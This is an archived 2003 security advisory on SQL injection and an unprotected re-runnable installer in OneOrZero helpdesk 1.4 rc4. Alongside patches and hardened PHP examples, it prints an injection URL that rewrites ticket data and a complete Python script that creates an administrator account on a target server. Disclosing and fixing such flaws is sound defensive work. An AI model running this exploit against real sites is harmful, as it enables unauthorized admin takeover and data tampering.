OneOrZero Security Problems (PHP)

From: Frog Man (leseulfrogat_private)
Date: Thu May 15 2003 - 10:06:40 PDT


    Information :
    °°°°°°°°°°°°°°
    Website : http://www.oneorzero.com
    Version : 1.4 rc4
    Problems :
    - SQL Injection
    - Admin Access
    
    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    
    supporter/tupdate.php :
    
    --------------------------------------------------------------------------
    // $sg and $id come straight from the request and are interpolated
    // unquoted, so anything that is not a number becomes part of the SQL
    if($groupid == 'change'){
    	$sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
    	$result = $db->query($sql);
    }
    --------------------------------------------------------------------------
    
    
    
    
    admin/install.php :
    
    ----------------------------------------------------------------------------------------------------------------------------
    
    [...]
    if($step == 2){
    
    	echo "<br><br>";
    	start("Helpdesk Installation", "center");
    		if($HTTP_POST_VARS['first'] == ''){
    			showError("first name");
    			$flag = 1;
    		}
    		if($HTTP_POST_VARS['last'] == ''){
    			showError("last name");
    			$flag = 1;
    		}
    		if($HTTP_POST_VARS['user'] == ''){
    			showError("user name");
    			$flag = 1;
    		}
    		if($HTTP_POST_VARS['email'] == ''){
    			showError("email address");
    			$flag = 1;
    		}
    		if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
    			showError("password");
    			$flag = 1;
    		}
    		if($HTTP_POST_VARS['office'] == ''){
    			showError("office");
    			$flag = 1;
    		}
    
    		if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
    			showError("password");
    			$flag = 1;
    		}
    
    		if(!validEmail($HTTP_POST_VARS['email'])){
    			showError("email");
    			$flag = 1;
    		}
    
    
    	if($flag == 1){
    		endit();
    		exit;
    	}
    [...]
    	$pwd = md5($HTTP_POST_VARS['pwd1']);
    	$query = "INSERT IGNORE into $mysql_users_table VALUES(NULL, 
    '".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."', 
    '".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '', 
    '".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."', 
    1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
    	$db->query($query);
    [...]
    
    ----------------------------------------------------------------------------------------------------------------------------
    
    
    
    
    Exploits :
    °°°°°°°°
    - 
    http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
    will change the description of ticket number 10 to "abcd"
    (char(97,98,99,100)), because the value of sg lands unquoted in the SET
    clause of the UPDATE query.
    
    - To exploit the second one, in Python 2.2 :
    
    
    --------------------------------------------------------------------------------------------------------------------------
    import urlparse
    import httplib
    import string


    class OneOrZero:
        def __init__(self,target,port,user,password):
            if port != "":
                self.port=str(port)
            else :
                self.port="80"
            # split the URL into host and base path
            self.path=str(urlparse.urlparse(target)[2])
            self.target=str(urlparse.urlparse(target)[1])
            self.user=str(user)
            self.password=str(password)
            self.USER_AGENT='OneOrZero.py'
            self.CreateAdminAccount()

        def CreateAdminAccount(self):
            # form fields expected by step 2 of admin/install.php
            # (the e-mail address was obfuscated by the list archive)
            data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=aat_private&office=abcd'

            try :
                print "Connecting On "+self.target+"...\n"

                http=httplib.HTTP(self.target,self.port)

                print "Sending Data On "+self.target+"...\n"

                http.putrequest("POST",self.path+"/admin/install.php")
                http.putheader("Content-Type","application/x-www-form-urlencoded")
                http.putheader("User-Agent",self.USER_AGENT)
                http.putheader("Host",self.target)
                http.putheader("Content-Length",str(len(data)))
                http.endheaders()

                http.send(data)

                code,msg,headers = http.getreply()

                print "HTTP Code : ",str(code)
                print "HTTP Connection : ",msg
                print "HTTP headers : \n",headers,"\n"

                file=http.getfile()
                if string.find(file.read(),"Administrator Account Created Successfully.") != -1:
                    print "Congratulations, Administrator Account Created Successfully."
                    print "You Can Log In Here : http://"+self.target+self.path+"/admin/control.php"
                    print "User : ",self.user
                    print "Password : ",self.password
                else :
                    print "Administrator Account Hasn't Been Created."

            except :
                print "Error During Admin Account Creation."


    # the instantiation must come after the class definition
    OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
    --------------------------------------------------------------------------------------------------------------------------
    
    
    
    
    You only have to change the line :
    OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
    
    
    Solution :
    °°°°°°°°
    A patch (and more details in French) can be found on 
    http://www.phpsecure.info.
    
    - In supporter/tupdate.php, add the following lines at the beginning :
    
    -------------------------------------------------------------------------------------------------
    // Quote every request value as magic_quotes_gpc=1 would, then break the
    // "(" of any function call such as char(...) so it cannot be executed
    foreach ($_REQUEST as $key=>$value) {

        if (get_magic_quotes_gpc()==0) {
            $value = addslashes($value); // This will reproduce the option magic_quotes_gpc=1
        }

        $value = str_replace('(','()',$value);

        // re-populate the globals the application reads ($groupid, $sg, $id),
        // as register_globals would
        ${$key} = $value;
        $_REQUEST[$key] = $value;
        if (isset($_POST[$key])) { $_POST[$key] = $value; }
        if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
        if (isset($_FILES[$key])) { $_FILES[$key] = $value; } // $_FILES, not $_FILE
        if (isset($_GET[$key])) { $_GET[$key] = $value; }
        if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
        if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value; }
        if (isset($HTTP_POST_FILES[$key])) { $HTTP_POST_FILES[$key] = $value; } // PHP 4 name is $HTTP_POST_FILES
        if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
    }
    -------------------------------------------------------------------------------------------------
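    The patch above quotes every request value and mangles every "(", which also damages legitimate parentheses in ticket text. A more targeted fix for the group-change branch of supporter/tupdate.php is to accept only integers for sg and id and to bind them as parameters. The following is an added example written for this page, not OneOrZero's own code; it assumes a PDO connection and reuses the advisory's payload against an in-memory SQLite table (constructed sample data) so it runs without MySQL.

```php
<?php
// Added example (not OneOrZero's code): hardened replacement for the
// group-change branch of supporter/tupdate.php. Assumes a PDO connection
// ($db) and the table name the original keeps in $mysql_tickets_table.

function buildVulnerableUpdate($table, $sg, $id) {
    // The original query: both values are interpolated unquoted, so a value
    // such as "groupid,description=char(97,98,99,100)" for $sg appends a
    // second assignment to the SET clause.
    return "UPDATE $table set groupid=$sg where id=$id";
}

function changeTicketGroup(PDO $db, $table, $sg, $id) {
    // Accept only unsigned integers. FILTER_VALIDATE_INT returns false for
    // "groupid,description=..." as well as for "10 OR 1=1".
    $sg = filter_var($sg, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($sg === false || $id === false) {
        return false;
    }
    // The table name cannot be a bound parameter; it comes from the config
    // file, not the request, but whitelist its characters before interpolating.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException('bad table name');
    }
    $stmt = $db->prepare("UPDATE `$table` SET groupid = :sg WHERE id = :id");
    $stmt->bindValue(':sg', $sg, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Demonstration with the advisory's payload against constructed sample data
// in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE tickets (id INTEGER PRIMARY KEY, groupid INTEGER, description TEXT)");
$db->exec("INSERT INTO tickets VALUES (10, 1, 'original text')");

$payload = 'groupid,description=char(97,98,99,100)';
echo buildVulnerableUpdate('tickets', $payload, '10'), "\n";
// UPDATE tickets set groupid=groupid,description=char(97,98,99,100) where id=10

var_dump(changeTicketGroup($db, 'tickets', $payload, '10'));   // bool(false): rejected
var_dump(changeTicketGroup($db, 'tickets', '3', '10'));        // int(1): one row updated
echo $db->query("SELECT description FROM tickets WHERE id = 10")->fetchColumn(), "\n";
// original text
```

    Rejecting the request outright (rather than quoting it) is the right behaviour here because groupid and id are numeric foreign keys; a non-integer value is never a legitimate input and is worth logging as a probe.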
    
    
    - In admin/install.php, put the lines :
    
    ---------------------------------------------------------------
    	$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
    	$result = $db->query($sql);
    	$num_rows = $db->num_rows($result);
    	if ($num_rows > 0){
    		die("<b>OneOrZero Is Already Installed.</b>");
    	}
    ---------------------------------------------------------------
    
    just after :
    
    ---------------
    if($step == 2){
    ---------------
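    The row-count check above is the advisory's own fix. The added example below (written for this page, not OneOrZero's code) wraps the same idea in a function and adds a second, independent signal, a lock file written once the first administrator exists, so a database reset or a renamed users table does not silently reopen the installer. It assumes a PDO connection, the $mysql_users_table name used by install.php, and a lock-file path of your choosing; the SQLite table and the temporary lock file are constructed for the demonstration.

```php
<?php
// Added example (not OneOrZero's code): a guard for step 2 of admin/install.php.
// Assumes a PDO connection ($db) and the users table name from the config;
// $lockFile is an assumed path outside the web root.

function installationIsComplete(PDO $db, $usersTable, $lockFile) {
    // Either signal is enough to refuse a re-run of the installer.
    if (file_exists($lockFile)) {
        return true;
    }
    if (!preg_match('/^[A-Za-z0-9_]+$/', $usersTable)) {
        throw new InvalidArgumentException('bad table name');
    }
    $count = (int) $db->query("SELECT COUNT(*) FROM `$usersTable`")->fetchColumn();
    return $count > 0;
}

function finishInstallation($lockFile) {
    // Written once, right after the first admin row has been inserted.
    return file_put_contents($lockFile, date('c') . "\n", LOCK_EX) !== false;
}

// Demonstration with constructed sample data: an in-memory SQLite users table
// and a lock file in the system temp directory.
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pwd TEXT)");
$lock = sys_get_temp_dir() . '/oneorzero-install.lock';
@unlink($lock);

var_dump(installationIsComplete($db, 'users', $lock));   // bool(false): fresh install may proceed

$stmt = $db->prepare("INSERT INTO users VALUES (1, :user, :pwd)");
$stmt->execute([':user' => 'admin', ':pwd' => password_hash('secret', PASSWORD_DEFAULT)]);
finishInstallation($lock);

var_dump(installationIsComplete($db, 'users', $lock));   // bool(true): step 2 must die()

// In install.php the check sits directly after `if($step == 2){`:
//   if (installationIsComplete($db, $mysql_users_table, $lockFile)) {
//       die("<b>OneOrZero Is Already Installed.</b>");
//   }
unlink($lock);
```

    Removing or renaming admin/install.php after installation remains the simplest safeguard; the guard above covers deployments where the file is left in place.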
    
    frog-m@n
    
    This archive was generated by hypermail 2b30 : Thu May 15 2003 - 22:39:14 PDT